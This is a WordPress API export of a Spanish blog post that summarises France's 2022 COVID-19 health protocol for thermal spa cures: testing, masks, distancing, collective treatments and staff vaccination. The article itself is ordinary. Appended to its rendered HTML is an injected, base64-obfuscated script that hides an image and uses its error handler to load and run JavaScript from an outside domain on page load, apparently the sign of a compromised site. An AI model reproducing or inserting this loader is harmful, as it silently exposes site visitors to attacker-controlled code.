{"id":5114,"date":"2022-03-15T12:02:46","date_gmt":"2022-03-15T15:02:46","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5114"},"modified":"2025-08-13T16:22:13","modified_gmt":"2025-08-13T19:22:13","slug":"francia-covid-19-las-nuevas-medidas-sanitarias-para-tu-cura-termica-en-2022","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5114","title":{"rendered":"Francia, COVID-19: Las nuevas medidas sanitarias para tu cura t\u00e9rmica en 2022"},"content":{"rendered":"\n<h3 class=\"has-text-color wp-block-heading\" id=\"el-protocolo-sanitario-para-el-ano-2022-acaba-de-ser-transmitido-a-los-banos-termales-descubre-las-medidas-diferentes-y-mantenidas-de-la-norma-2021-que-los-centros-termales-ponen-en-marcha-para-darte-la-bienvenida-en-cura-con-total-seguridad\" style=\"color:#1be1b9\"><strong>El protocolo sanitario para el a\u00f1o 2022 acaba de ser transmitido a los ba\u00f1os termales. Descubre las medidas, diferentes y mantenidas de la norma 2021, que los centros termales ponen en marcha para darte la bienvenida en cura con total seguridad.<\/strong>\u00a0<\/h3>\n\n\n\n<p>La\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/02\/28\/quels-centres-thermaux-ouvrent-leurs-portes-en-mars-2022\/\" target=\"_blank\" rel=\"noreferrer noopener\">temporada termal de 2022<\/a>\u00a0se ha reanudado desde hace varias semanas ya para muchos establecimientos termales. Hasta entonces, las medidas sanitarias aplicadas ante el Covid-19 eran las\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2021\/05\/18\/covid-19-quel-protocole-sanitaire-pour-votre-cure-thermale-en-2021\/\" target=\"_blank\" rel=\"noreferrer noopener\">ya puestas en marcha en 2021<\/a>.\u00a0<\/p>\n\n\n\n<p>Sin embargo, ante la evoluci\u00f3n actual de la pandemia del Covid-19 y la paulatina flexibilizaci\u00f3n de las medidas puestas en marcha por el Gobierno, los profesionales del sector termal han iniciado negociaciones para actualizar la referencia de salud termal para el a\u00f1o 2022.&nbsp;<\/p>\n\n\n\n<p>Esto se hace ya que&nbsp;se ha publicado una&nbsp;<strong>nueva versi\u00f3n del repositorio<\/strong>, validada por el Ministerio de Econom\u00eda y Finanzas, tras una primera lectura del Centro de Crisis Sanitarias (DGS), adscrito al Ministerio del Interior. Los principales ajustes a recordar se refieren a una&nbsp;<strong>relajaci\u00f3n de las medidas resultantes<\/strong>&nbsp;de la versi\u00f3n anterior del sistema de referencia de salud t\u00e9rmica.&nbsp;<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-color has-text-color wp-block-heading\" id=\"reglas-de-salud-relajadas-para-los-tratamientos-de-spa-en-2022\"><strong>Reglas de salud relajadas para los tratamientos de spa en 2022<\/strong>&nbsp;<\/h2>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/www.officiel-thermalisme.com\/wp-content\/uploads\/2022\/02\/ODTMAG-IDEERECUE-cure-ennuie-salle-attente-700x320.jpg\" alt=\"cura t\u00e9rmica de la sala de espera de la mujer\" class=\"wp-image-34357\" \/><\/figure><\/div>\n\n\n\n<h3 class=\"has-text-color wp-block-heading\" id=\"las-condiciones-de-acceso-a-los-banos-termales\" style=\"color:#11eec8\"><strong>Las condiciones de acceso a los ba\u00f1os termales<\/strong>&nbsp;<\/h3>\n\n\n\n<p>Los centros\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/01\/25\/le-pass-vaccinal-ne-s-appliquera-pas-aux-cures-thermales\/\" target=\"_blank\" rel=\"noreferrer noopener\">termales no est\u00e1n sujetos al pase de vacunaci\u00f3n, ni al pase sanitario<\/a>. En el caso de que no presente un calendario de vacunaci\u00f3n completo o un certificado de recuperaci\u00f3n, la presentaci\u00f3n de una\u00a0<strong>RT-PCR negativa o prueba antig\u00e9nica de menos de 24 horas\u00a0<\/strong>ya no es obligatoria sino\u00a0<strong>recomendable<\/strong>, dependiendo de la elecci\u00f3n del establecimiento.\u00a0<\/p>\n\n\n\n<p>En el caso de que no haya podido realizar una prueba dentro de las 24 horas previas al inicio de su curaci\u00f3n t\u00e9rmica, puede realizar una&nbsp;<strong>prueba antig\u00e9nica<\/strong>&nbsp;<strong>directamente en el sitio<\/strong>, con un resultado visible en menos de 30 minutos, cuando el centro lo permita.&nbsp;<\/p>\n\n\n\n<p>Por definici\u00f3n, un&nbsp;<strong>r\u00e9gimen de vacunaci\u00f3n completo<\/strong>&nbsp;interviene:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>7 d\u00edas despu\u00e9s de la 2\u00aa inyecci\u00f3n para vacunas de doble inyecci\u00f3n (Pfizer, Moderna, AstraZeneca);&nbsp;<\/li><li>28 d\u00edas despu\u00e9s de la inyecci\u00f3n para vacunas con una sola inyecci\u00f3n (Johnson &amp; Johnson);&nbsp;<\/li><li>7 d\u00edas despu\u00e9s de la inyecci\u00f3n en personas que han tenido antecedentes de Covid (1 inyecci\u00f3n \u00fanica):&nbsp;<\/li><li>Despu\u00e9s de la dosis de refuerzo incluida dentro de los 4 meses posteriores a la \u00faltima inyecci\u00f3n.&nbsp;<\/li><\/ul>\n\n\n\n<p>Es su&nbsp;<strong>m\u00e9dico termal<\/strong>, durante su primera consulta, quien se asegurar\u00e1&nbsp;<strong>de que cumple con las condiciones de acceso previamente establecidas por el centro termal<\/strong>. Le invitamos a ponerse en contacto con su establecimiento para conocer las normas vigentes en materia de acceso a curas.&nbsp;<\/p>\n\n\n\n<p>A diferencia del a\u00f1o pasado,&nbsp;<strong>ya no se requieren autopruebas quincenales&nbsp;<\/strong>si se accede a los ba\u00f1os termales sin vacunarse. En caso de s\u00edntomas sugestivos de Covid-19, se le pedir\u00e1 que realice una RT-PCR o prueba antig\u00e9nica. Si el resultado es positivo, se aplica el protocolo de seguro de salud, al que se capacita al personal t\u00e9rmico.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"usar-una-mascara-en-interiores\"><strong>Usar una m\u00e1scara en interiores<\/strong>&nbsp;<\/h3>\n\n\n\n<p>Hasta entonces, el uso de mascarilla era obligatorio desde la entrada de los ba\u00f1os termales y durante toda la duraci\u00f3n de los tratamientos. Hoy en d\u00eda, aunque ya no exista una obligaci\u00f3n general de llevar mascarilla a partir del 14 de marzo de 2022,&nbsp;<strong>sigue siendo muy recomendable en los espacios colectivos cerrados<\/strong>&nbsp;de los ba\u00f1os termales. Especialmente para personas en riesgo, fuera del aislamiento o fr\u00e1giles.&nbsp;<\/p>\n\n\n\n<p>Por otro lado, a partir del 14 de marzo de 2022,\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/03\/01\/cure-thermale-masque-obligatoire\/\" target=\"_blank\" rel=\"noreferrer noopener\">ya no ser\u00e1 necesario el uso de mascarillas y el pase de vacunaci\u00f3n<\/a>\u00a0en infraestructuras distintas a los ba\u00f1os termales como:\u00a0<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>centros termol\u00fadicos;&nbsp;<\/li><li>balnearios;&nbsp;<\/li><li>piscinas;&nbsp;<\/li><li>restaurantes.&nbsp;<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"cuidado-colectivo\"><strong>Cuidado colectivo<\/strong>&nbsp;<\/h3>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/www.officiel-thermalisme.com\/wp-content\/uploads\/2021\/12\/ODTMAG-IDEE-RECUE-cure-vieux-UNE-1-700x467.jpg\" alt=\"Ancianos en cura termal\" class=\"wp-image-30324\" \/><\/figure><\/div>\n\n\n\n<p>En 2020 y 2021 se hab\u00edan suspendido algunos cuidados colectivos que potenciaban la propagaci\u00f3n del virus por vaporizaci\u00f3n o aerosolizaci\u00f3n. La norma 2022 anuncia que&nbsp;<strong>ahora existe un medidor<\/strong>&nbsp;para garantizar esta atenci\u00f3n nuevamente, traducido por:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>La instalaci\u00f3n de una&nbsp;<strong>pared divisoria<\/strong>&nbsp;entre los dos pacientes;&nbsp;<\/li><li>Respeto al&nbsp;<strong>distanciamiento f\u00edsico de al menos 2 metros<\/strong>&nbsp;entre pacientes.&nbsp;<\/li><\/ul>\n\n\n\n<p>Como recordatorio, la&nbsp;<strong>atenci\u00f3n colectiva en cuesti\u00f3n&nbsp;<\/strong>es la siguiente:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Vaporario;&nbsp;<\/li><li>El emanotarium;&nbsp;<\/li><li>Rehabilitaci\u00f3n respiratoria colectiva;&nbsp;<\/li><li>Aerosol colectivo;&nbsp;<\/li><li>Inhalaci\u00f3n colectiva;&nbsp;<\/li><li>El ba\u00f1o de vapor colectivo;&nbsp;<\/li><li>Rehabilitaci\u00f3n respiratoria colectiva;&nbsp;<\/li><li>Drenaje postural en la sala com\u00fan.&nbsp;<\/li><\/ul>\n\n\n\n<h3 class=\"has-text-color wp-block-heading\" id=\"distanciamiento-fisico-en-la-piscina\" style=\"color:#10f2c4\"><strong>Distanciamiento f\u00edsico en la piscina<\/strong>&nbsp;<\/h3>\n\n\n\n<p>El distanciamiento f\u00edsico debe mantenerse dentro de los ba\u00f1os termales. Por otro lado, en la piscina, esta \u00faltima se reduce a&nbsp;<strong>1 ba\u00f1ista por metro cuadrado<\/strong>.&nbsp;<\/p>\n\n\n\n<h3 class=\"has-text-color wp-block-heading\" id=\"vacunacion-obligatoria-para-el-personal\" style=\"color:#15d7af\"><strong>Vacunaci\u00f3n obligatoria para el personal<\/strong>&nbsp;<\/h3>\n\n\n\n<p>Desde el 5 de agosto de 2021,&nbsp;<strong>la vacunaci\u00f3n contra el Covid-19 es obligatoria para los profesionales de la salud<\/strong>. En los centros termales, esta obligaci\u00f3n afecta a:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>M\u00e9dicos;&nbsp;<\/li><li>Parteras;&nbsp;<\/li><li>Enfermeras;&nbsp;<\/li><li>Masajistas-fisioterapeutas;&nbsp;<\/li><li>Pedicuras \u2013 Pod\u00f3logos;&nbsp;<\/li><li>Dietista;&nbsp;<\/li><li>Psic\u00f3logos;&nbsp;<\/li><li>Oste\u00f3patas;&nbsp;<\/li><li>Quiropr\u00e1cticos;&nbsp;<\/li><li>Todas las personas que trabajan en las mismas instalaciones que estos profesionales.&nbsp;<\/li><\/ul>\n\n\n\n<h2 class=\"has-text-color wp-block-heading\" id=\"las-medidas-eliminadas\" style=\"color:#12ebe4\"><strong>Las medidas eliminadas<\/strong><\/h2>\n\n\n\n<p>Se eliminan algunas medidas que se hab\u00edan tomado para reducir las fuentes de contaminaci\u00f3n importada del virus. Se refieren a:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>limpieza y desinfecci\u00f3n del claqu\u00e9 en la entrada del tratamiento;<\/li><li>el acaparamiento de ropa;<\/li><li>el uso de abrigos y zapatos para&nbsp;<a href=\"https:\/\/www.officiel-thermalisme.com\/orientations_therap\/voies-respiratoires\/\">los hu\u00e9spedes del spa respiratorio<\/a>&nbsp;;<\/li><li>el uso del secador de pelo.<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"las-medidas-sanitarias-de-2022-que-se-prolongan\"><strong>Las medidas sanitarias de 2022 que se prolongan&nbsp;<\/strong>&nbsp;<\/h2>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/www.officiel-thermalisme.com\/wp-content\/uploads\/2022\/03\/ODTMAG-ACTU-referentiel-sanitaire-2022-2-700x467.jpg\" alt=\"estaci\u00f3n de gel de manos\" class=\"wp-image-34815\" \/><\/figure><\/div>\n\n\n\n<p>Se siguen introduciendo medidas de supervisi\u00f3n para la prevenci\u00f3n y gesti\u00f3n de la crisis sanitaria del COVID-19, de la misma manera que durante sus curas t\u00e9rmicas en 2020 y 2021, entre ellas:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Instalaci\u00f3n de una c\u00e9lula COVID-19<\/strong>&nbsp;en municipios balnearios para coordinar la informaci\u00f3n y seguimiento de las recomendaciones de las autoridades sanitarias;&nbsp;<\/li><li><strong>Formaci\u00f3n del personal del centro termal<\/strong>&nbsp;en la norma \u00abPrevenci\u00f3n y gesti\u00f3n de riesgos COVID-19\u00bb;&nbsp;<\/li><li><strong>Aplicaci\u00f3n de un plan de zonificaci\u00f3n<\/strong>, identificando principalmente \u00e1reas secas y humedales;&nbsp;<\/li><li><strong>Llevar<\/strong>&nbsp;equipos&nbsp;<strong>de protecci\u00f3n<\/strong>&nbsp;individual&nbsp;(guantes, chalecos, overoles, zapatos, cascos, arneses de seguridad, protecci\u00f3n auditiva, etc.) adaptados a las diferentes categor\u00edas de personal;&nbsp;<\/li><li>Visualizaci\u00f3n de&nbsp;<strong>instrucciones de salud&nbsp;<\/strong>;&nbsp;<\/li><li>Cumplimiento de las normas de&nbsp;<strong>distanciamiento f\u00edsico&nbsp;<\/strong>en el establecimiento termal (zonas comunes y estaciones de tratamiento);&nbsp;<\/li><li><strong>Desinfecci\u00f3n de<\/strong>&nbsp;manos en la entrada y dentro del establecimiento,&nbsp;<strong>lavado frecuente<\/strong>&nbsp;con la instalaci\u00f3n de \u00abestaciones\u00bb dedicadas;&nbsp;<\/li><li><strong>Marcado recorrido del cliente<\/strong>&nbsp;respetando las normas de distanciamiento social;&nbsp;<\/li><li><strong>Refuerzo de la limpieza<\/strong>&nbsp;y desinfecci\u00f3n de equipos, instalaciones, pisos, mobiliario, estaciones de trabajo y estaciones de atenci\u00f3n;&nbsp;<\/li><li><strong>Ventilaci\u00f3n frecuente de las instalaciones&nbsp;<\/strong>;&nbsp;<\/li><li>Etc.&nbsp;<\/li><\/ul>\n\n\n\n<p>Estas normas podr\u00e1n ser revisadas en funci\u00f3n de la reducci\u00f3n de las medidas previstas por el Gobierno en las pr\u00f3ximas semanas o meses. Los profesionales del sector contin\u00faan sus esfuerzos para aspirar a conseguir una vuelta a la normalidad de los tratamientos en curas t\u00e9rmicas, en cuanto la situaci\u00f3n sanitaria lo permita.&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/03\/11\/covid-19-les-nouvelles-mesures-sanitaires-pour-votre-cure-thermale-en-2022\/?utm_source=Officiel+du+Thermalisme&amp;utm_campaign=b85cf2ce30-EMAIL_CAMPAIGN_2021_09_30_01_17_COPY_01&amp;utm_medium=email&amp;utm_term=0_4a2750a4c7-b85cf2ce30-1357231813\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/03\/Captura-web_15-3-2022_11595_www.officiel-thermalisme.com_.jpeg\" alt=\"\" class=\"wp-image-5115\" width=\"300\" height=\"117\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/03\/Captura-web_15-3-2022_11595_www.officiel-thermalisme.com_.jpeg 386w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/03\/Captura-web_15-3-2022_11595_www.officiel-thermalisme.com_-300x117.jpeg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><figcaption><strong><em><span style=\"color:#00d084\" class=\"tadv-color\">Fuente de la informaci\u00f3n<\/span><\/em><\/strong>:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El protocolo sanitario para el a\u00f1o 2022 acaba de ser transmitido a los ba\u00f1os termales. Descubre las medidas, diferentes y mantenidas de la norma 2021, que los centros termales ponen en marcha para darte la bienvenida en cura con total seguridad.\u00a0 La\u00a0temporada termal de 2022\u00a0se ha reanudado desde hace varias semanas ya para muchos establecimientos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5116,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,14],"tags":[],"class_list":["post-5114","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-de-bienestar","category-turismo-salud"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5114"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5114\/revisions"}],"predecessor-version":[{"id":10704,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5114\/revisions\/10704"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5116"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}